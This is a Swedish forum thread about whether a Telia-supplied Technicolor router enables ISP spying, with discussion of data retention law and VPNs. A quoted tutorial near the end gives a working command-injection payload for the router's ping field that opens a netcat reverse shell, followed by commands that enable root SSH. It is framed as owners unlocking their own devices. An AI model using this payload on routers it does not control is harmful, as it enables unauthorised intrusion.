Våga använda Telias router (integritet)

Permalänk
Medlem

Våga använda Telias router (integritet)

Hej!

För ett tag sedan fick vi ett prisvärt erbjudande om fiber från Telia, så nu har jag äntligen en sjysst uppkoppling.
Våga man använda den gratis routern som följde med ? (Technicolor TG799vac Xtream)
Telia har ju för vana att spionera på alla via alla sina tjänster, och lagra trafikdata i millenier när lagen bara kräver en månad.
Lägger de rutinmässigt in bakdörrar i sina routrar för att kunna spionera på mig ?
Jag ställde lite frågor till supporten och de uppgav att de hade lättare att ge mig support om jag använde den av Telia rekommenderade routern och att de kunde hjälpa till med ärenden om mitt WiFi om jag använde deras router som de skickade med, men inte om jag använde min egen.

Just ju använder jag en fem år gammal router som är föråldrad ur många hänseenden och som begränsar bandbredden, men där jag lagt in min egen custom firmware och säkrat upp alla lösenord osv. så ingen kan spionera på mig.

Skall jag köpa en ny privat router och köra egen firmware eller är det lika bra att koppla in den nya Telia-routern ? Tacksam för svar.

PS Jag håller inte på med några olagligheter men hatar att det skall spioneras på allt jag gör.

Permalänk
Medlem

Är du på riktigt?

Permalänk
Medlem

Antar att du alltid använder VPN? Annars är du ändå inte någon form av anonym på internet.

Permalänk
Medlem

Hmm jag skrev ju i och för sig att jag var tacksam för svar men jag syftade egentligen på svar som motsvarade trådens ämne. Jag undrar alltså: Vågar jag använda Telias router till mitt WiFi trots att jag redan har Telia som ip-leverantör, eller innebär den kombinationen att Telia kan övervaka och ta kontroll över godtyckliga enheter i mitt nätverk ?

Med tanke på vilka möjligheter som finns i tjänster Telia Zone så borde svaret självklart vara att Telia har total kontroll över mitt nätverk om jag kör deras router, men jag ville bara checka med dem som vet mer än mig / har nån slags uppfattning..
https://ifttt.com/telia_zone

Permalänk
Medlem

Jag brukar slå på VPN när jag skall skicka ett mejl eller liknande, men t.ex. min ipTV-streaming är inte bakom VPN. Mvh.

Permalänk
Medlem

Det enda Telia lagrar är vad du har för IP-Adress. DVS, spelar ingen roll ur det avseendet huruvida du använder deras router eller ej.

Visa signatur

AMD Ryzen 7 5800X3D | EVGA GeForce RTX 3080 10GB FTW3 ULTRA | ASUS ROG Strix B450-F Gaming | Corsair RM750X V2 | Crucial Ballistix Sport LT 3200MHz 16GB | Samsung 980 Pro 1TB | Crucial MX500 2TB | NZXT H500

Permalänk
Medlem

Spelar ingen roll vad du har för router, dom har lika lätt att spionera på dig ändå. Med det sagt så se jag inte någon anledning till att dom skulle göra det, då det skulle bryta mot både svenska lagar, etiska regler, och inte tjäna något syfta överhuvudtaget för dom att se vilka hemsidor du surfar på..

Visa signatur

CPU: Ryzen 9 3900x Noctua NH-D14 MOBO: TUF Gaming X570-PLUS GPU: GTX 980 RAM: 32 GB 3200 MHz Chassi: R4 PSU: Corsair AX860 Hörlurar: SteelSeries 840 Mus: Logitech G502 Lightspeed V.v. nämn eller citera mig för att få svar.

Permalänk
Medlem
Skrivet av Cenorida:

Det enda Telia lagrar är vad du har för IP-Adress. DVS, spelar ingen roll ur det avseendet huruvida du använder deras router eller ej.

Hmm men uppfyller inte Telia Ipred-lagen då ? Enligt Ipred så måsta alla internetleverantörer lagra alla uppgifter om vilka sajter jag besökt osv i en månad (eller var det tre månader ?) Telia har tidigare varit "bäst i klassen" och lagrat alla såna uppgifter mycket längre än vad Ipred-lagen krävde.

Permalänk
Medlem
Skrivet av Haptic:

Spelar ingen roll vad du har för router, dom har lika lätt att spionera på dig ändå. Med det sagt så se jag inte någon anledning till att dom skulle göra det, då det skulle bryta mot både svenska lagar, etiska regler, och inte tjäna något syfta överhuvudtaget för dom att se vilka hemsidor du surfar på..

Fast det är väl ändå inte sant? Gång på gång så uppmanas ju operatörerna av PTS att de ska lagra uppgifter i 6 månader, trots att de inte får det för EU.

Till TS: Jag skulle nog inte bry mig så mycket om Telias router spionerar om de ändå är din ISP. Dock kan det ju vara värt att byta ur prestanda synpunkt. Du borde definitivt använda VPN dock, förslagsvis på router nivå.

Permalänk
Medlem
Skrivet av Haptic:

Spelar ingen roll vad du har för router, dom har lika lätt att spionera på dig ändå. Med det sagt så se jag inte någon anledning till att dom skulle göra det, då det skulle bryta mot både svenska lagar, etiska regler, och inte tjäna något syfta överhuvudtaget för dom att se vilka hemsidor du surfar på..

Varje gång integritetslagar förändrats har Telia varit remiss-instans och varje gång har de kraftfullt argumenterat för att det behövs mer övervakning av deras kunder och att de inte på något sätt motsätter sig SÄPOs eller FRAs önskemål. Det verkar ligga i gamla Televerkets DNA att vilja övervaka medborgarna, ett arv från förr.

Jag har lite svårt att se att de kan erbjuda såna här tjänster om de inte har root-access till min router (och det kan jag garantera att de inte har med min nuvarande..): https://telia.zone/

Men visst, du har en poäng.. Även om jag byter till Bahnhof och slipper att min operatör loggar mig så lär ju fortfarande en rad säkerhetsmyndigheter (svenska och utländska) göra det.

Permalänk
Medlem
Skrivet av Baxtex:

Fast det är väl ändå inte sant? Gång på gång så uppmanas ju operatörerna av PTS att de ska lagra uppgifter i 6 månader, trots att de inte får det för EU.

Till TS: Jag skulle nog inte bry mig så mycket om Telias router spionerar om de ändå är din ISP. Dock kan det ju vara värt att byta ur prestanda synpunkt. Du borde definitivt använda VPN dock, förslagsvis på router nivå.

Skrivet av Oldskool:

Varje gång integritetslagar förändrats har Telia varit remiss-instans och varje gång har de kraftfullt argumenterat för att det behövs mer övervakning av deras kunder och att de inte på något sätt motsätter sig SÄPOs eller FRAs önskemål. Det verkar ligga i gamla Televerkets DNA att vilja övervaka medborgarna, ett arv från förr.

Jag har lite svårt att se att de kan erbjuda såna här tjänster om de inte har root-access till min router (och det kan jag garantera att de inte har med min nuvarande..): https://telia.zone/

Men visst, du har en poäng.. Även om jag byter till Bahnhof och slipper att min operatör loggar mig så lär ju fortfarande en rad säkerhetsmyndigheter (svenska och utländska) göra det.

IPRED säger att dom måste lagra vilka ip-adresser som är kopplade till vilka abonnemang. inte att dom ska lagra vad som sker över deras nät.

Visa signatur

CPU: Ryzen 9 3900x Noctua NH-D14 MOBO: TUF Gaming X570-PLUS GPU: GTX 980 RAM: 32 GB 3200 MHz Chassi: R4 PSU: Corsair AX860 Hörlurar: SteelSeries 840 Mus: Logitech G502 Lightspeed V.v. nämn eller citera mig för att få svar.

Permalänk
Medlem
Skrivet av Haptic:

IPRED säger att dom måste lagra vilka ip-adresser som är kopplade till vilka abonnemang. inte att dom ska lagra vad som sker över deras nät.

Du har rätt! Telebolagen tycks ha slutat att lagra trafikdata!
https://sverigesradio.se/sida/artikel.aspx?programid=83&artik...
Åtminstone krävar alltså inte PTS att de lagrar sådan data längre.
Undrar om det faktiskt innebär att även Telia slutat att lagra sådan data, de har ju tidigare alltid varit väldigt snabba med att implementera lagar som innebär utökad övervakning av deras kunder och väldig sena med att följa lagar som förbättrar deras kunders integritet.

Permalänk
Medlem

Tycker dock att de verkar lite avvaktande i förhållande till SOU 2017:75 så det kanske börjar bli bättre...

https://www.regeringen.se/490cb9/contentassets/a3e8bb4742c64e...
https://www.regeringen.se/remisser/2017/10/remiss-sou-201775-...

Permalänk
Medlem

Det finns en läsvärd tråd om den routern här.
Lite kortfattat finns flertalet säkerhetsluckor i Technicolor routrar som man kanske vill undvika.

Visa signatur

Här hade jag tänkt skriva ett skämt om UDP,
men var osäker på om det skulle nå fram.

Permalänk
Hedersmedlem

Hej!

Nu sätter vi på oss foliehatten och antar att Telia är ute efter att spionera på dig. Detta för att svara på din fråga.

Att använda Telias router exponerar inte dig nämnvärt mycket mer jämfört med att använda en egen router att ta del av innehållet i din trafik. Om de vill spionera på din trafik på Internet så kan de göra det i sitt nät. De behöver inte din router för detta.

Det som Telia potentiellt kan få åtkomst till genom att ha åtkomst i din router är mer på metadatanivå, d.v.s. att de kan ta reda på anslutna MAC-adresser (ett slagt unikt serienummer som finns på en nätverksansluten enhet) till WiFi/Ethernet, och därmed få koll på vilka enheter som är anslutna till ditt hemma-WiFi. Detta kan användas för att veta om du är hemma eller ej. Liknande analys kan också göras med hjälp av att bara titta på trafiken över Internet, men det är lite svårare.

De kan också genom att utföra en ARP-poisoning-attack fånga in trafik mellan två enheter på ditt LAN. Detta är dock väldigt "högljutt" och går att upptäcka om man håller koll på detta. Därför har jag svårt att se att Telia rutinmässigt skulle göra detta. Då hade det stått i tidningarna för länge sedan.

Till sist så får de en angreppsmöjlighet mot enheter på ditt lokala LAN. Om du är oroad över detta, sätt upp adekvat säkerhet på dina anslutna enheter med lösenord och åtkomstkontroll. Det är ett allmänt bra tips, för det är inte bara routern som kan göra den här typen av angrepp - det kan vilken dator eller enhet som helst på ditt LAN göra.

Du bör också känna till att ett VPN egentligen inte eliminerar risken att din trafik samlas in eller spioneras på. Allt som händer är att man måste lita på sin VPN-leverantör (och VPN-leverantörens internetleverantör) istället för sin egen Internetleverantör. Ett VPN för internetåtkomst är vettigt i vissa fall, t.ex. då man ansluter mot ett osäkert publikt WiFi, när man vill använda detta för att kringgå geoblockering, eller om man bor i ett land som är "farligt", och man litar mer på en potentiell utländsk uträttelsetjänst/polis än sina egna myndigheter. Man ska veta att även om en VPN-leverantör inte samlar in information om vem som står bakom ett abonemang och tar anonyma betalningar, så brukar det inte vara särskilt svårt att med hjälp av trafikanalys räkna ut vem som står bakom ett visst abonnemang.

Sammanfattning: Operativ säkerhet är svårt. Att ha en router från Telia exponerar dig inte för särskilt mycket mer än att bara ha internetanslutningen genom dem.

Jag tycker att en mycket mer intressant fråga är: Hur säker är din router mot utomstående (d.v.s. random hackers på Internet) att ta sig in? Om en utomstående tar sig in i din router kan han sniffa och manipulera om din trafik, d.v.s. inte bara Telia utan en okänd part. En annan fråga: Litar du på din routertillverkare?

Permalänk
Medlem
Skrivet av Oldskool:

Hmm men uppfyller inte Telia Ipred-lagen då ? Enligt Ipred så måsta alla internetleverantörer lagra alla uppgifter om vilka sajter jag besökt osv i en månad (eller var det tre månader ?) Telia har tidigare varit "bäst i klassen" och lagrat alla såna uppgifter mycket längre än vad Ipred-lagen krävde.

Ipred lagen innebär bara som jag tidigare sa, att de lagrar data gällande vem som ligger bakom en viss IP-adress. Någon övrigt datatrafik samlar de inte in.

Visa signatur

AMD Ryzen 7 5800X3D | EVGA GeForce RTX 3080 10GB FTW3 ULTRA | ASUS ROG Strix B450-F Gaming | Corsair RM750X V2 | Crucial Ballistix Sport LT 3200MHz 16GB | Samsung 980 Pro 1TB | Crucial MX500 2TB | NZXT H500

Permalänk
Medlem
Skrivet av pv2b:

Hej!

Nu sätter vi på oss foliehatten och antar att Telia är ute efter att spionera på dig. Detta för att svara på din fråga.

Att använda Telias router exponerar inte dig nämnvärt mycket mer jämfört med att använda en egen router att ta del av innehållet i din trafik. Om de vill spionera på din trafik på Internet så kan de göra det i sitt nät. De behöver inte din router för detta.

Det som Telia potentiellt kan få åtkomst till genom att ha åtkomst i din router är mer på metadatanivå, d.v.s. att de kan ta reda på anslutna MAC-adresser (ett slagt unikt serienummer som finns på en nätverksansluten enhet) till WiFi/Ethernet, och därmed få koll på vilka enheter som är anslutna till ditt hemma-WiFi. Detta kan användas för att veta om du är hemma eller ej. Liknande analys kan också göras med hjälp av att bara titta på trafiken över Internet, men det är lite svårare.

De kan också genom att utföra en ARP-poisoning-attack fånga in trafik mellan två enheter på ditt LAN. Detta är dock väldigt "högljutt" och går att upptäcka om man håller koll på detta. Därför har jag svårt att se att Telia rutinmässigt skulle göra detta. Då hade det stått i tidningarna för länge sedan.

Till sist så får de en angreppsmöjlighet mot enheter på ditt lokala LAN. Om du är oroad över detta, sätt upp adekvat säkerhet på dina anslutna enheter med lösenord och åtkomstkontroll. Det är ett allmänt bra tips, för det är inte bara routern som kan göra den här typen av angrepp - det kan vilken dator eller enhet som helst på ditt LAN göra.

Du bör också känna till att ett VPN egentligen inte eliminerar risken att din trafik samlas in eller spioneras på. Allt som händer är att man måste lita på sin VPN-leverantör (och VPN-leverantörens internetleverantör) istället för sin egen Internetleverantör. Ett VPN för internetåtkomst är vettigt i vissa fall, t.ex. då man ansluter mot ett osäkert publikt WiFi, när man vill använda detta för att kringgå geoblockering, eller om man bor i ett land som är "farligt", och man litar mer på en potentiell utländsk uträttelsetjänst/polis än sina egna myndigheter. Man ska veta att även om en VPN-leverantör inte samlar in information om vem som står bakom ett abonemang och tar anonyma betalningar, så brukar det inte vara särskilt svårt att med hjälp av trafikanalys räkna ut vem som står bakom ett visst abonnemang.

Sammanfattning: Operativ säkerhet är svårt. Att ha en router från Telia exponerar dig inte för särskilt mycket mer än att bara ha internetanslutningen genom dem.

Jag tycker att en mycket mer intressant fråga är: Hur säker är din router mot utomstående (d.v.s. random hackers på Internet) att ta sig in? Om en utomstående tar sig in i din router kan han sniffa och manipulera om din trafik, d.v.s. inte bara Telia utan en okänd part. En annan fråga: Litar du på din routertillverkare?

Tack för ditt svar, det var klargörande! Precis vad jag hoppades på.

-- Slutsats --
Jag litar i grund och botten inte alls på Telia, och kommer att byta till Bahnhof så fort bindningstiden förlupit.
Jag kommer att behöva skaffa mig en extern kryptering / VPN så länge, det borde höja min säkerhet betydligt.
Jag säljer av min nya router billigt, det är ju inte lite misstänkt att Telia använder en modell som är känd för sina säkerhetsluckor (avsiktiliga eller oavsiktliga ?) och som heller inte åtgärdar dem. En privatrouter som ser till operatörens behöv av att övervaka i första hand.
Jag får läsa in mig på vilka routrar som ger stora möjligheter att modda firmwaremässigt och som inte tillverkas av något företag med uppenbara kopplingar till säkerhetstjänsten (exempelvis Huawei har såna kopplingar..). (Tips någon ?)

Tack för kommentarerna folks!

Permalänk
Medlem

Inte läst hela tråden, men:

Kolla lite hur div nätaktiva personer som varit eftertraktade av myndigheter har åkt dit till slut.

Många tycker att de är noggranna med VPN eller TOR eller vilken tjänst man nu vill använda för att vara anonyma på nätet, men det krävs några få verkligt små misstag för att du skall vara helt rökt ändå om någon verkligen vill komma åt dig.

Jag tror det kan ligga lite falsk trygghet i att misstänka hårdvaror och leverantörer för spionage men se sig själv som säker när man kör lite VPN, hur många har faktiskt den fulla kollen som krävs för att vara verkligt anonym i den digitala världen ?

Visa signatur

En del av mina bildlänkar hostas på egen maskin, är bildlänkarna trasiga, ha tålamod.

Permalänk
Medlem

Uppdatering: Hmm jag kan nog använda routern ändå; Det finns ju en trevlig guide som visar hur man kan dropbeara in och nollställa operatörens och tillverkarens bakdörrar; Här framgår var de tar kontroll bakvägen: https://sendit.nu/f/aKHBmzPHKxSBnB.png
https://sendit.nu/f/lyatoppoTdk7RC.jpg

Permalänk
Medlem

@Oldskool: Du kan ju lika gärna hänvisa till tråden där dom snackar om det här... speciellt eftersom det är här på clockers

Skrivet av anon277726:

Sorry, inte varit inloggad på ett tag och fått lite meddelanden av några som vill ta sig in i sin router så jag försöker sätta ihop en enkel tutorial här. Brukar inte skriva tutorials direkt så det blir som det blir, lets go!

Detta fungerar till v16.2 Jade, telias nuvarande version. Har du 17.x och vill nedgradera dig igen så pma så skickar jag ett tool för att nedgradera din firmware.

Client side:
1. Dra hem en valfri linux dist och installera netcat om det inte finns förinstallerat.
- Finns säkert till powershell också skulle jag tro om man kör Windows.
2. Kör igång en netcat listener på följande vis
root@sweclockers $ nc -lvvp 1337
listening on [any] 1337 ...

-
3. Logga in på http://192.168.1.1 eller http://dlsdevice.lan
2. Klicka på advanced setup
3. Klicka på inställningar för: Diagnostics Ping&Trace
4. I ping rutan skriv:
:::::::;nc 192.168.1.x 1337 -e /bin/sh (naturligtvis ip-nummret till din maskin som har netcat igång på port 1337)

The magic is now done, you're in!

sh-4.4# nc -lvvp 1337
listening on [any] 1337 ...
connect to [192.168.1.104] from router [192.168.1.1] 35835
https://sendit.nu/f/Pj1dnAsPJnirz.png

- Nu börjar det roliga.

Går igenom det viktigaste annars får jag sitta hela natten då det finns otroligt mycket att ställa in och leka med.

Byt root password:
skriv 'passwd' när du ser att du är ansluten.

Spana in operatörens setup för att bevittna deras backdoor med egna ögon:
cat /etc/config/dropbear

Denna config vill vi editera, hanterar du vi/vim så är de bara att editera 'vim /etc/config/dropbear'
Är du inte van med vim så använd sed bara för att editera configen:

Ändra operatörens settings till off och 0 eller kommenetera ut deras settings bara genom att skriv:
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear; sed -i '21s/off/on/' /etc/config/dropbear; sed -i '24s/0/1/' /etc/config/dropbear

Bör se ut något såhär:
https://sendit.nu/f/aKHBmzPHKxSBnB.png

Reboota inte ännu
Starta om dropbear genom att skriva
/etc/init.d/dropbear restart

ssh:a in till routern så är du inne och ser deras welcome message:
https://sendit.nu/f/lyatoppoTdk7RC.jpg

-

Härifrån kan du ändra precis ALLT, bridge mode, dns modes, serie nummer, yeah you name it! Men det tar vi en annan gång, för att installera paket använd opkg. /bin/opkg

/bin/opkg list-installed # för att lista telias & technicolors förinstallerade skit
/bin/opkg update # för att hämta en uppdaterad package list
/bin/opkg install package # för att installera paket
/bin/opkg search package # för att söka efter paket.

http://pkg.entware.net/binaries/armv5/ är vad som är inställt från fabrik, vill du lägga till fler källor så är det i /etc/opkg.conf det skall läggas till.

root@OpenWrt:~# cat /etc/opkg.conf .
src/gz packages http://pkg.entware.net/binaries/armv5
dest root /
dest ram /opt/tmp
lists_dir ext /opt/var/opkg-lists
option tmp_dir /opt/tmp

- Ni kan även lägga till massa funktioner som openvpn, ändra sync tider, fixa usb sharing som har varit blockerat tidigare. Ja precis allt som man skall kunna göra helt enkelt.

Lycka till!

Edit: Ja just, vill du inte ha password auth tillåten så är det dropbear som gäller, bara installera dropbear på valfri dist:

Generera din nyckel genom att skriva:
dropbearkey -t rsa -f /etc/dropbear/authorized_keys -s 4096

Följt av:
ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

Du kan nu reboota routern genom att skriva 'reboot' när du ställt in allt.

Dropbear kommer vara igång från boot om du ställt in dropbear rätt.

Nu är det bara att ansluta utan password i framtiden från din maskin.

// wuseman

Permalänk
Medlem
Skrivet av Plattelöparn:

Det finns en läsvärd tråd om den routern här.
Lite kortfattat finns flertalet säkerhetsluckor i Technicolor routrar som man kanske vill undvika.

Den tråden är inte relevant i den här tråden, då BBB och telia inte kör samma FW på den routern.

Permalänk
Medlem

Om du vill vara på den "säkra sidan", inte för att säga att Telia är värre än de flesta av operatörer när det kommer till lagring av data för sina kunder så hade jag nog rekommenderat dig att bygga dig en egen router och köra t.ex. pfSesne.

Köp sedan en VPN tjänst och konfigurera upp VPN på routern, då skapar du en "säker"/privat anslutning mellan din router och din VPN leverantör.

Men när det kommer till frågan om man vågar använda den router de skickar med, så ja...det är något man faktiskt vågar. Sedan skulle jag inte rekommendera dig att hänga på forum där barn utnytjas sexuellt eller ladda ned blockbuster filmer ifrån thepiratebay.

Det gäller att hålla sig till de lagliga formerna av "underhållning".

Permalänk
Avstängd

@Oldskool:

Jag skulle aldrig använda sånt det är ren skit i mina ögon. Har hjälp många kompisar med deras router bara massa problem hela tiden.

Nästan alla router är osäker då det kommer för då uppdateringar och mycket annat det bästa är att köra egen brandväg som pfsense.

Visa signatur

Man är inte dum för att man har stavproblem.
Läs mer om min synfel Visual Snow
Om mig ----> #16970666

Permalänk
Medlem
Skrivet av Gaist:

Den tråden är inte relevant i den här tråden, då BBB och telia inte kör samma FW på den routern.

Även om trådtiteln anger BBB, så diskuteras Telias router ingående i den tråden, så den är mycket läsvärd.

Visa signatur

Här hade jag tänkt skriva ett skämt om UDP,
men var osäker på om det skulle nå fram.

Permalänk
Medlem

Tack för era svar! Det låter som att jag får bygga mig en NUC i sommar med pfsense.
Sen så håller jag inte på med några extrema brott på nätet utan det handlar mer om en känsla av att inte vilja vara övervakad. Det finns saker jag verkligen inte skulle vilja blev publikt kända men det gäller ingenting som egentligen är olagligt eller intresserar polisen.

Permalänk
Medlem

Det är väl ingen som anställer folk för att spionera på sina kunder. Det är inte ekonomiskt försvarbart. Telia som alla andra företag vill tjäna pengar, mycket pengar. Inte anställa folk för att kolla vilka sidor folk ansluter till vilket inte tjänar något syfte.

Visa signatur

Nätverkstekniker

Permalänk
Medlem

Köp en Vilfo VPN-router och ett abbonemang hos OVPN. OVPN för inga loggar över vilka siter du besöker och Njord Law Firm kommer inte hitta dig Har haft min i snart 2 veckor och so far so good...

https://www.vilfo.com/